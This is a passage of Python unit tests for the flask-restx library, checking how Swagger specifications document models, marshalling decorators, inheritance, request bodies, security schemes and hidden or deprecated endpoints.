def test_model_with_non_uri_chars_in_name(self, api, client):
    """Model names with URI-unsafe characters stay raw in "definitions" but
    are percent-encoded inside the $ref pointers."""
    # name will be encoded as 'Person%2F%2F%3Flots%7B%7D%20of%20%26illegals%40%60'
    name = "Person//?lots{} of &illegals@`"
    fields = api.model(name, {})

    @api.route("/model-bad-uri/")
    class ModelBadUri(restx.Resource):
        @api.doc(model=fields)
        def get(self):
            return {}

        @api.response(201, "", model=name)
        def post(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert name in data["definitions"]

    path = data["paths"]["/model-bad-uri/"]
    assert (
        path["get"]["responses"]["200"]["schema"]["$ref"]
        == "#/definitions/Person%2F%2F%3Flots%7B%7D%20of%20%26illegals%40%60"
    )
    assert (
        path["post"]["responses"]["201"]["schema"]["$ref"]
        == "#/definitions/Person%2F%2F%3Flots%7B%7D%20of%20%26illegals%40%60"
    )
def test_marshal_decorator_with_code(self, api, client):
    """``@api.marshal_with(code=...)`` documents the response under that code."""
    # NOTE(review): renamed from test_marchal_decorator_with_code (typo).
    fields = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-as-dict/")
    class ModelAsDict(restx.Resource):
        @api.marshal_with(fields, code=204)
        def delete(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]

    responses = data["paths"]["/model-as-dict/"]["delete"]["responses"]
    assert responses == {
        "204": {
            "description": "Success",
            "schema": {"$ref": "#/definitions/Person"},
        }
    }
def test_marshal_decorator_with_description(self, api, client):
    """``@api.marshal_with(description=...)`` replaces the default "Success"."""
    # NOTE(review): renamed from test_marchal_decorator_with_description (typo).
    person = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-as-dict/")
    class ModelAsDict(restx.Resource):
        @api.marshal_with(person, description="Some details")
        def get(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]

    responses = data["paths"]["/model-as-dict/"]["get"]["responses"]
    assert responses == {
        "200": {
            "description": "Some details",
            "schema": {"$ref": "#/definitions/Person"},
        }
    }
def test_marshal_decorator_with_envelope(self, api, client):
    """``@api.marshal_with(envelope=...)`` wraps the $ref in an inline object
    whose single property is the envelope key."""
    # NOTE(review): renamed from test_marhsal_decorator_with_envelope (typo).
    person = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-as-dict/")
    class ModelAsDict(restx.Resource):
        @api.marshal_with(person, envelope="person")
        def get(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]

    responses = data["paths"]["/model-as-dict/"]["get"]["responses"]
    assert responses == {
        "200": {
            "description": "Success",
            "schema": {"properties": {"person": {"$ref": "#/definitions/Person"}}},
        }
    }
def test_model_as_flat_dict_with_marshal_decorator_list(self, api, client):
    """``@api.marshal_with(as_list=True)`` documents an array-of-$ref schema."""
    # NOTE(review): renamed from ..._marchal_decorator_list (typo).
    fields = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-as-dict/")
    class ModelAsDict(restx.Resource):
        @api.marshal_with(fields, as_list=True)
        def get(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]
    assert data["definitions"]["Person"] == {
        "properties": {
            "name": {"type": "string"},
            "age": {"type": "integer"},
            "birthdate": {"type": "string", "format": "date-time"},
        },
        "type": "object",
    }

    path = data["paths"]["/model-as-dict/"]
    assert path["get"]["responses"]["200"]["schema"] == {
        "type": "array",
        "items": {"$ref": "#/definitions/Person"},
    }
def test_model_as_flat_dict_with_marshal_decorator_list_alt(self, api, client):
    """``@api.marshal_list_with`` is equivalent to ``marshal_with(as_list=True)``."""
    # NOTE(review): renamed from ..._marchal_decorator_list_alt (typo).
    fields = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-as-dict/")
    class ModelAsDict(restx.Resource):
        @api.marshal_list_with(fields)
        def get(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]

    path = data["paths"]["/model-as-dict/"]
    assert path["get"]["responses"]["200"]["schema"] == {
        "type": "array",
        "items": {"$ref": "#/definitions/Person"},
    }
def test_model_as_flat_dict_with_marshal_decorator_list_kwargs(self, api, client):
    """``@api.marshal_list_with`` forwards ``code`` and ``description`` kwargs."""
    # NOTE(review): renamed from ..._marchal_decorator_list_kwargs (typo).
    fields = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-as-dict/")
    class ModelAsDict(restx.Resource):
        @api.marshal_list_with(fields, code=201, description="Some details")
        def get(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]

    path = data["paths"]["/model-as-dict/"]
    assert path["get"]["responses"] == {
        "201": {
            "description": "Some details",
            "schema": {"type": "array", "items": {"$ref": "#/definitions/Person"},},
        }
    }
def test_model_as_dict_with_list(self, api, client):
    """A ``fields.List`` of a primitive renders as an inline array property."""
    fields = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "tags": restx.fields.List(restx.fields.String),
        },
    )

    @api.route("/model-with-list/")
    class ModelAsDict(restx.Resource):
        @api.doc(model=fields)
        def get(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]
    assert data["definitions"]["Person"] == {
        "properties": {
            "name": {"type": "string"},
            "age": {"type": "integer"},
            "tags": {"type": "array", "items": {"type": "string"}},
        },
        "type": "object",
    }

    path = data["paths"]["/model-with-list/"]
    assert path["get"]["responses"]["200"]["schema"] == {
        "$ref": "#/definitions/Person"
    }
def test_model_as_nested_dict_with_list(self, api, client):
    """A ``List(Nested(...))`` field registers the nested model too."""
    address = api.model("Address", {"road": restx.fields.String,})
    person = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
            "addresses": restx.fields.List(restx.fields.Nested(address)),
        },
    )

    @api.route("/model-with-list/")
    class ModelAsDict(restx.Resource):
        @api.doc(model=person)
        def get(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]
    assert "Address" in data["definitions"]
def test_model_list_of_primitive_types(self, api, client):
    """``model=[int]`` / ``model=[str]`` render inline primitive arrays and
    register no definitions."""
    @api.route("/model-list/")
    class ModelAsDict(restx.Resource):
        @api.doc(model=[int])
        def get(self):
            return {}

        @api.doc(model=[str])
        def post(self):
            return {}

    data = client.get_specs()

    assert "definitions" not in data

    path = data["paths"]["/model-list/"]
    assert path["get"]["responses"]["200"]["schema"] == {
        "type": "array",
        "items": {"type": "integer"},
    }
    assert path["post"]["responses"]["200"]["schema"] == {
        "type": "array",
        "items": {"type": "string"},
    }
def test_model_list_as_flat_dict(self, api, client):
    """``model=[model]`` and ``model=["Name"]`` both render array-of-$ref."""
    fields = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-as-dict/")
    class ModelAsDict(restx.Resource):
        @api.doc(model=[fields])
        def get(self):
            return {}

        @api.doc(model=["Person"])
        def post(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]

    path = data["paths"]["/model-as-dict/"]
    for method in "get", "post":
        assert path[method]["responses"]["200"]["schema"] == {
            "type": "array",
            "items": {"$ref": "#/definitions/Person"},
        }
def test_model_doc_on_class(self, api, client):
    """A class-level ``@api.doc(model=...)`` applies to every method."""
    fields = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-as-dict/")
    @api.doc(model=fields)
    class ModelAsDict(restx.Resource):
        def get(self):
            return {}

        def post(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]

    path = data["paths"]["/model-as-dict/"]
    for method in "get", "post":
        assert path[method]["responses"]["200"]["schema"] == {
            "$ref": "#/definitions/Person"
        }
def test_model_doc_for_method_on_class(self, api, client):
    """A class-level ``@api.doc(get={...})`` applies only to the GET method."""
    fields = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-as-dict/")
    @api.doc(get={"model": fields})
    class ModelAsDict(restx.Resource):
        def get(self):
            return {}

        def post(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]

    path = data["paths"]["/model-as-dict/"]
    assert path["get"]["responses"]["200"]["schema"] == {
        "$ref": "#/definitions/Person"
    }
    # POST was not targeted by the class-level doc, so it gets no schema.
    assert "schema" not in path["post"]["responses"]["200"]
def test_model_with_discriminator(self, api, client):
    """A ``discriminator=True`` field sets "discriminator" and forces the
    field into "required"."""
    fields = api.model(
        "Person",
        {
            "name": restx.fields.String(discriminator=True),
            "age": restx.fields.Integer,
        },
    )

    @api.route("/model-with-discriminator/")
    class ModelAsDict(restx.Resource):
        @api.marshal_with(fields)
        def get(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]
    assert data["definitions"]["Person"] == {
        "properties": {"name": {"type": "string"}, "age": {"type": "integer"},},
        "discriminator": "name",
        "required": ["name"],
        "type": "object",
    }
def test_model_with_discriminator_override_require(self, api, client):
    """``required=False`` cannot override a discriminator: the field is still
    listed in "required" (per the Swagger 2.0 discriminator rules)."""
    fields = api.model(
        "Person",
        {
            "name": restx.fields.String(discriminator=True, required=False),
            "age": restx.fields.Integer,
        },
    )

    @api.route("/model-with-discriminator/")
    class ModelAsDict(restx.Resource):
        @api.marshal_with(fields)
        def get(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]
    assert data["definitions"]["Person"] == {
        "properties": {"name": {"type": "string"}, "age": {"type": "integer"},},
        "discriminator": "name",
        "required": ["name"],
        "type": "object",
    }
def test_model_not_found(self, api, client):
    """Referencing an unregistered model name makes spec generation fail
    with an HTTP 500 on the specs endpoint."""
    @api.route("/model-not-found/")
    class ModelAsDict(restx.Resource):
        @api.doc(model="NotFound")
        def get(self):
            return {}

    client.get_specs(status=500)
def test_specs_no_duplicate_response_keys(self, api, client):
    """
    This tests that the swagger.json document will not be written with duplicate object keys
    due to the coercion of dict keys to string. The last @api.response should win.
    """
    # Note the use of a strings '404' and '200' in class decorators as opposed to ints in method decorators.
    @api.response("404", "Not Found")
    class BaseResource(restx.Resource):
        def get(self):
            pass

    model = api.model("SomeModel", {"message": restx.fields.String,})

    @api.route("/test/")
    @api.response("200", "Success")
    class TestResource(BaseResource):
        # @api.marshal_with also yields a response
        @api.marshal_with(model, code=200, description="Success on method")
        @api.response(404, "Not Found on method")
        def get(self):
            # Fixed: was a bare `{}` expression statement that did nothing.
            return {}

    data = client.get_specs("")
    paths = data["paths"]

    op = paths["/test/"]["get"]
    # (leftover debug print(op["responses"]) removed)
    assert op["responses"] == {
        "200": {
            "description": "Success on method",
            "schema": {"$ref": "#/definitions/SomeModel"},
        },
        "404": {"description": "Not Found on method",},
    }
def test_clone(self, api, client):
    """``api.clone`` produces a standalone copy: only the clone is registered
    (the unused parent is not emitted in "definitions")."""
    parent = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    child = api.clone("Child", parent, {"extra": restx.fields.String,})

    @api.route("/extend/")
    class ModelAsDict(restx.Resource):
        @api.doc(model=child)
        def get(self):
            return {}

        @api.doc(model="Child")
        def post(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    # The parent is never referenced, so a clone does not pull it in.
    assert "Person" not in data["definitions"]
    assert "Child" in data["definitions"]

    path = data["paths"]["/extend/"]
    assert (
        path["get"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Child"
    )
    assert (
        path["post"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Child"
    )
def test_inherit(self, api, client):
    """``api.inherit`` renders the child as ``allOf`` [parent $ref, extras]
    and both models are registered; marshalling the child also works."""
    parent = api.model(
        "Person", {"name": restx.fields.String, "age": restx.fields.Integer,}
    )

    child = api.inherit("Child", parent, {"extra": restx.fields.String,})

    @api.route("/inherit/")
    class ModelAsDict(restx.Resource):
        @api.marshal_with(child)
        def get(self):
            return {
                "name": "John",
                "age": 42,
                "extra": "test",
            }

        @api.doc(model="Child")
        def post(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]
    assert "Child" in data["definitions"]
    assert data["definitions"]["Person"] == {
        "properties": {"name": {"type": "string"}, "age": {"type": "integer"},},
        "type": "object",
    }
    assert data["definitions"]["Child"] == {
        "allOf": [
            {"$ref": "#/definitions/Person"},
            {"properties": {"extra": {"type": "string"}}, "type": "object"},
        ]
    }

    path = data["paths"]["/inherit/"]
    assert (
        path["get"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Child"
    )
    assert (
        path["post"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Child"
    )

    # Marshalling through the inherited model keeps all parent + child fields.
    data = client.get_json("/inherit/")
    assert data == {
        "name": "John",
        "age": 42,
        "extra": "test",
    }
def test_inherit_inline(self, api, client):
    """An inherited model used through Nested/List fields is still registered
    and marshals correctly for both single and list usage."""
    parent = api.model(
        "Person", {"name": restx.fields.String, "age": restx.fields.Integer,}
    )

    child = api.inherit("Child", parent, {"extra": restx.fields.String,})

    output = api.model(
        "Output",
        {
            "child": restx.fields.Nested(child),
            "children": restx.fields.List(restx.fields.Nested(child)),
        },
    )

    @api.route("/inherit/")
    class ModelAsDict(restx.Resource):
        @api.marshal_with(output)
        def get(self):
            return {
                "child": {"name": "John", "age": 42, "extra": "test",},
                "children": [
                    {"name": "John", "age": 42, "extra": "test",},
                    {"name": "Doe", "age": 33, "extra": "test2",},
                ],
            }

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]
    assert "Child" in data["definitions"]

    data = client.get_json("/inherit/")
    assert data == {
        "child": {"name": "John", "age": 42, "extra": "test",},
        "children": [
            {"name": "John", "age": 42, "extra": "test",},
            {"name": "Doe", "age": 33, "extra": "test2",},
        ],
    }
def test_polymorph_inherit(self, api, client):
    """A ``fields.Polymorph`` mapping registers the parent and every child
    model alongside the enclosing output model."""
    class Child1:
        pass

    class Child2:
        pass

    parent = api.model(
        "Person", {"name": restx.fields.String, "age": restx.fields.Integer,}
    )

    child1 = api.inherit("Child1", parent, {"extra1": restx.fields.String,})
    child2 = api.inherit("Child2", parent, {"extra2": restx.fields.String,})

    # Maps runtime classes to the model used to marshal their instances.
    mapping = {
        Child1: child1,
        Child2: child2,
    }

    output = api.model("Output", {"child": restx.fields.Polymorph(mapping)})

    @api.route("/polymorph/")
    class ModelAsDict(restx.Resource):
        @api.marshal_with(output)
        def get(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]
    assert "Child1" in data["definitions"]
    assert "Child2" in data["definitions"]
    assert "Output" in data["definitions"]

    path = data["paths"]["/polymorph/"]
    assert (
        path["get"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Output"
    )
def test_polymorph_inherit_list(self, api, client):
    """``List(Polymorph(...))`` registers all models and marshals each item
    with the model matching its runtime class."""
    class Child1(object):
        name = "Child1"
        extra1 = "extra1"

    class Child2(object):
        name = "Child2"
        extra2 = "extra2"

    parent = api.model("Person", {"name": restx.fields.String,})

    child1 = api.inherit("Child1", parent, {"extra1": restx.fields.String,})
    child2 = api.inherit("Child2", parent, {"extra2": restx.fields.String,})

    mapping = {
        Child1: child1,
        Child2: child2,
    }

    output = api.model(
        "Output", {"children": restx.fields.List(restx.fields.Polymorph(mapping))}
    )

    @api.route("/polymorph/")
    class ModelAsDict(restx.Resource):
        @api.marshal_with(output)
        def get(self):
            return {"children": [Child1(), Child2()]}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]
    assert "Child1" in data["definitions"]
    assert "Child2" in data["definitions"]
    assert "Output" in data["definitions"]

    path = data["paths"]["/polymorph/"]
    assert (
        path["get"]["responses"]["200"]["schema"]["$ref"] == "#/definitions/Output"
    )

    # Each list item is marshalled with the model mapped to its class.
    data = client.get_json("/polymorph/")
    assert data == {
        "children": [
            {"name": "Child1", "extra1": "extra1",},
            {"name": "Child2", "extra2": "extra2",},
        ]
    }
def test_expect_model(self, api, client):
    """``@api.expect(model)`` adds a single required body parameter named
    "payload" referencing the model (and no description)."""
    person = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-as-dict/")
    class ModelAsDict(restx.Resource):
        @api.expect(person)
        def post(self):
            return {}

    data = client.get_specs()

    assert "definitions" in data
    assert "Person" in data["definitions"]
    assert data["definitions"]["Person"] == {
        "properties": {
            "name": {"type": "string"},
            "age": {"type": "integer"},
            "birthdate": {"type": "string", "format": "date-time"},
        },
        "type": "object",
    }

    op = data["paths"]["/model-as-dict/"]["post"]
    assert len(op["parameters"]) == 1

    parameter = op["parameters"][0]
    assert parameter == {
        "name": "payload",
        "in": "body",
        "required": True,
        "schema": {"$ref": "#/definitions/Person"},
    }
    assert "description" not in parameter
def test_body_model_shortcut(self, api, client):
    """@api.doc(model=...) combined with @api.expect documents both response and body."""
    fields = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-as-dict/")
    class ModelAsDict(restx.Resource):
        @api.doc(model="Person")
        @api.expect(fields)
        def post(self):
            return {}

    specs = client.get_specs()
    assert "definitions" in specs
    assert "Person" in specs["definitions"]
    assert specs["definitions"]["Person"] == {
        "type": "object",
        "properties": {
            "name": {"type": "string"},
            "age": {"type": "integer"},
            "birthdate": {"type": "string", "format": "date-time"},
        },
    }

    post_op = specs["paths"]["/model-as-dict/"]["post"]
    assert post_op["responses"]["200"]["schema"]["$ref"] == "#/definitions/Person"
    assert len(post_op["parameters"]) == 1
    body_param = post_op["parameters"][0]
    assert body_param == {
        "name": "payload",
        "in": "body",
        "required": True,
        "schema": {"$ref": "#/definitions/Person"},
    }
    assert "description" not in body_param
def test_expect_model_list(self, api, client):
    """Expecting [model] produces an array body schema of model $refs."""
    model = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-list/")
    class ModelAsDict(restx.Resource):
        @api.expect([model])
        def post(self):
            return {}

    specs = client.get_specs()
    assert "definitions" in specs
    assert "Person" in specs["definitions"]
    assert specs["definitions"]["Person"] == {
        "type": "object",
        "properties": {
            "name": {"type": "string"},
            "age": {"type": "integer"},
            "birthdate": {"type": "string", "format": "date-time"},
        },
    }

    body_param = specs["paths"]["/model-list/"]["post"]["parameters"][0]
    assert body_param == {
        "name": "payload",
        "in": "body",
        "required": True,
        "schema": {"type": "array", "items": {"$ref": "#/definitions/Person"}},
    }
def test_both_model_and_parser_from_expect(self, api, client):
    """@api.expect accepts a parser and a model together: query + body parameters."""
    parser = api.parser()
    parser.add_argument("param", type=int, help="Some param")
    person = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/with-parser/", endpoint="with-parser")
    class WithParserResource(restx.Resource):
        @api.expect(parser, person)
        def get(self):
            return {}

    specs = client.get_specs()
    assert "definitions" in specs
    assert "Person" in specs["definitions"]
    assert specs["definitions"]["Person"] == {
        "type": "object",
        "properties": {
            "name": {"type": "string"},
            "age": {"type": "integer"},
            "birthdate": {"type": "string", "format": "date-time"},
        },
    }

    assert "/with-parser/" in specs["paths"]
    get_op = specs["paths"]["/with-parser/"]["get"]
    assert len(get_op["parameters"]) == 2
    by_location = {p["in"]: p for p in get_op["parameters"]}

    query_param = by_location["query"]
    assert query_param["name"] == "param"
    assert query_param["type"] == "integer"
    assert query_param["in"] == "query"
    assert query_param["description"] == "Some param"

    assert by_location["body"] == {
        "name": "payload",
        "in": "body",
        "required": True,
        "schema": {"$ref": "#/definitions/Person"},
    }
def test_expect_primitive_list(self, api, client):
    """Expecting a list of a primitive field yields an array-of-strings body schema."""

    @api.route("/model-list/")
    class ModelAsDict(restx.Resource):
        @api.expect([restx.fields.String])
        def post(self):
            return {}

    specs = client.get_specs()
    body_param = specs["paths"]["/model-list/"]["post"]["parameters"][0]
    assert body_param == {
        "name": "payload",
        "in": "body",
        "required": True,
        "schema": {"type": "array", "items": {"type": "string"}},
    }
def test_body_model_list(self, api, client):
    """A list of a registered model as body is documented as an array of $refs."""
    fields = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-list/")
    class ModelAsDict(restx.Resource):
        @api.expect([fields])
        def post(self):
            return {}

    specs = client.get_specs()
    assert "definitions" in specs
    assert "Person" in specs["definitions"]
    assert specs["definitions"]["Person"] == {
        "type": "object",
        "properties": {
            "name": {"type": "string"},
            "age": {"type": "integer"},
            "birthdate": {"type": "string", "format": "date-time"},
        },
    }

    body_param = specs["paths"]["/model-list/"]["post"]["parameters"][0]
    assert body_param == {
        "name": "payload",
        "in": "body",
        "required": True,
        "schema": {"type": "array", "items": {"$ref": "#/definitions/Person"}},
    }
def test_expect_model_with_description(self, api, client):
    """Expecting a (model, description) tuple carries the description to the body param."""
    person = api.model(
        "Person",
        {
            "name": restx.fields.String,
            "age": restx.fields.Integer,
            "birthdate": restx.fields.DateTime,
        },
    )

    @api.route("/model-as-dict/")
    class ModelAsDict(restx.Resource):
        @api.expect((person, "Body description"))
        def post(self):
            return {}

    specs = client.get_specs()
    assert "definitions" in specs
    assert "Person" in specs["definitions"]
    assert specs["definitions"]["Person"] == {
        "type": "object",
        "properties": {
            "name": {"type": "string"},
            "age": {"type": "integer"},
            "birthdate": {"type": "string", "format": "date-time"},
        },
    }

    post_op = specs["paths"]["/model-as-dict/"]["post"]
    assert len(post_op["parameters"]) == 1
    assert post_op["parameters"][0] == {
        "name": "payload",
        "in": "body",
        "required": True,
        "description": "Body description",
        "schema": {"$ref": "#/definitions/Person"},
    }
def test_authorizations(self, app, client):
    """Declared authorizations appear as securityDefinitions; no root security by default."""
    restx.Api(
        app,
        authorizations={
            "apikey": {"type": "apiKey", "in": "header", "name": "X-API"}
        },
    )

    specs = client.get_specs()
    assert "securityDefinitions" in specs
    assert "security" not in specs
def test_single_root_security_string(self, api, client):
    """A single security scheme name applies globally, not per-operation."""
    api = restx.Api(
        app,
        security="apikey",
        authorizations={
            "apikey": {"type": "apiKey", "in": "header", "name": "X-API"}
        },
    )

    @api.route("/authorizations/")
    class ModelAsDict(restx.Resource):
        def post(self):
            return {}

    specs = client.get_specs()
    assert specs["securityDefinitions"] == {
        "apikey": {"type": "apiKey", "in": "header", "name": "X-API"}
    }
    assert specs["security"] == [{"apikey": []}]
    assert "security" not in specs["paths"]["/authorizations/"]["post"]
def test_single_root_security_object(self, app, client):
    """A dict of scheme->scopes becomes a single global security requirement."""
    security_definitions = {
        "oauth2": {
            "type": "oauth2",
            "flow": "accessCode",
            "tokenUrl": "https://somewhere.com/token",
            "scopes": {
                "read": "Grant read-only access",
                "write": "Grant read-write access",
            },
        },
        "implicit": {
            "type": "oauth2",
            "flow": "implicit",
            "tokenUrl": "https://somewhere.com/token",
            "scopes": {
                "read": "Grant read-only access",
                "write": "Grant read-write access",
            },
        },
    }
    api = restx.Api(
        app,
        security={"oauth2": "read", "implicit": ["read", "write"]},
        authorizations=security_definitions,
    )

    @api.route("/authorizations/")
    class ModelAsDict(restx.Resource):
        def post(self):
            return {}

    specs = client.get_specs()
    assert specs["securityDefinitions"] == security_definitions
    # A bare scope string is normalized into a one-element list.
    assert specs["security"] == [{"oauth2": ["read"], "implicit": ["read", "write"]}]
    assert "security" not in specs["paths"]["/authorizations/"]["post"]
def test_root_security_as_list(self, app, client):
    """A list of schemes yields one global security requirement per entry."""
    security_definitions = {
        "apikey": {"type": "apiKey", "in": "header", "name": "X-API"},
        "oauth2": {
            "type": "oauth2",
            "flow": "accessCode",
            "tokenUrl": "https://somewhere.com/token",
            "scopes": {
                "read": "Grant read-only access",
                "write": "Grant read-write access",
            },
        },
    }
    api = restx.Api(
        app,
        security=["apikey", {"oauth2": "read"}],
        authorizations=security_definitions,
    )

    @api.route("/authorizations/")
    class ModelAsDict(restx.Resource):
        def post(self):
            return {}

    specs = client.get_specs()
    assert specs["securityDefinitions"] == security_definitions
    assert specs["security"] == [{"apikey": []}, {"oauth2": ["read"]}]
    assert "security" not in specs["paths"]["/authorizations/"]["post"]
def test_method_security(self, app, client):
    """Security given via @api.doc applies per-method, both as list and as string."""
    api = restx.Api(
        app,
        authorizations={
            "apikey": {"type": "apiKey", "in": "header", "name": "X-API"}
        },
    )

    @api.route("/authorizations/")
    class ModelAsDict(restx.Resource):
        @api.doc(security=["apikey"])
        def get(self):
            return {}

        @api.doc(security="apikey")
        def post(self):
            return {}

    specs = client.get_specs()
    assert specs["securityDefinitions"] == {
        "apikey": {"type": "apiKey", "in": "header", "name": "X-API"}
    }
    assert "security" not in specs

    path_item = specs["paths"]["/authorizations/"]
    for verb in ("get", "post"):
        assert path_item[verb]["security"] == [{"apikey": []}]
def test_security_override(self, app, client):
    """Method-level @api.doc(security=...) replaces the root security requirement."""
    security_definitions = {
        "apikey": {"type": "apiKey", "in": "header", "name": "X-API"},
        "oauth2": {
            "type": "oauth2",
            "flow": "accessCode",
            "tokenUrl": "https://somewhere.com/token",
            "scopes": {
                "read": "Grant read-only access",
                "write": "Grant read-write access",
            },
        },
    }
    api = restx.Api(
        app,
        security=["apikey", {"oauth2": "read"}],
        authorizations=security_definitions,
    )

    @api.route("/authorizations/")
    class ModelAsDict(restx.Resource):
        @api.doc(security=[{"oauth2": ["read", "write"]}])
        def get(self):
            return {}

    specs = client.get_specs()
    assert specs["securityDefinitions"] == security_definitions
    get_op = specs["paths"]["/authorizations/"]["get"]
    assert get_op["security"] == [{"oauth2": ["read", "write"]}]
def test_security_nullify(self, app, client):
    """security=[] or security=None on a method clears the root requirement."""
    security_definitions = {
        "apikey": {"type": "apiKey", "in": "header", "name": "X-API"},
        "oauth2": {
            "type": "oauth2",
            "flow": "accessCode",
            "tokenUrl": "https://somewhere.com/token",
            "scopes": {
                "read": "Grant read-only access",
                "write": "Grant read-write access",
            },
        },
    }
    api = restx.Api(
        app,
        security=["apikey", {"oauth2": "read"}],
        authorizations=security_definitions,
    )

    @api.route("/authorizations/")
    class ModelAsDict(restx.Resource):
        @api.doc(security=[])
        def get(self):
            return {}

        @api.doc(security=None)
        def post(self):
            return {}

    specs = client.get_specs()
    assert specs["securityDefinitions"] == security_definitions
    path_item = specs["paths"]["/authorizations/"]
    for verb in ("get", "post"):
        assert path_item[verb]["security"] == []
def test_hidden_resource(self, api, client):
    """Resources hidden via doc=False, @api.hide or @api.doc(False) stay routable but undocumented."""

    @api.route("/test/", endpoint="test", doc=False)
    class TestResource(restx.Resource):
        def get(self):
            """
            GET operation
            """
            return {}

    @api.hide
    @api.route("/test2/", endpoint="test2")
    class TestResource2(restx.Resource):
        def get(self):
            """
            GET operation
            """
            return {}

    @api.doc(False)
    @api.route("/test3/", endpoint="test3")
    class TestResource3(restx.Resource):
        def get(self):
            """
            GET operation
            """
            return {}

    specs = client.get_specs()
    for hidden_path in ("/test/", "/test2/", "/test3/"):
        assert hidden_path not in specs["paths"]
        # Hidden from the spec, but still served.
        assert client.get(hidden_path).status_code == 200
def test_hidden_resource_from_namespace(self, api, client):
    """doc=False on a namespace route hides it from the spec but keeps it routable."""
    ns = api.namespace("ns")

    @ns.route("/test/", endpoint="test", doc=False)
    class TestResource(restx.Resource):
        def get(self):
            """
            GET operation
            """
            return {}

    specs = client.get_specs()
    assert "/ns/test/" not in specs["paths"]
    assert client.get("/ns/test/").status_code == 200
def test_hidden_methods(self, api, client):
    """Individual methods can be hidden via doc kwargs, @api.doc(False) or @api.hide."""

    @api.route("/test/", endpoint="test")
    @api.doc(delete=False)
    class TestResource(restx.Resource):
        def get(self):
            """
            GET operation
            """
            return {}

        @api.doc(False)
        def post(self):
            """POST operation.
            Should be ignored
            """
            return {}

        @api.hide
        def put(self):
            """PUT operation. Should be ignored"""
            return {}

        def delete(self):
            return {}

    specs = client.get_specs()
    path_item = specs["paths"]["/test/"]
    assert "get" in path_item
    assert "post" not in path_item
    assert "put" not in path_item

    # Hidden methods are still dispatchable.
    for verb in ("GET", "POST", "PUT"):
        assert client.open("/test/", method=verb).status_code == 200
def test_produces_method(self, api, client):
    """@api.produces on a single method documents 'produces' for that method only."""

    @api.route("/test/", endpoint="test")
    class TestResource(restx.Resource):
        def get(self):
            pass

        @api.produces(["application/octet-stream"])
        def post(self):
            pass

    specs = client.get_specs()
    assert "produces" not in specs["paths"]["/test/"]["get"]
    post_op = specs["paths"]["/test/"]["post"]
    assert post_op["produces"] == ["application/octet-stream"]
def test_deprecated_resource(self, api, client):
    """@api.deprecated on a resource marks every operation deprecated."""

    @api.deprecated
    @api.route("/test/", endpoint="test")
    class TestResource(restx.Resource):
        def get(self):
            pass

        def post(self):
            pass

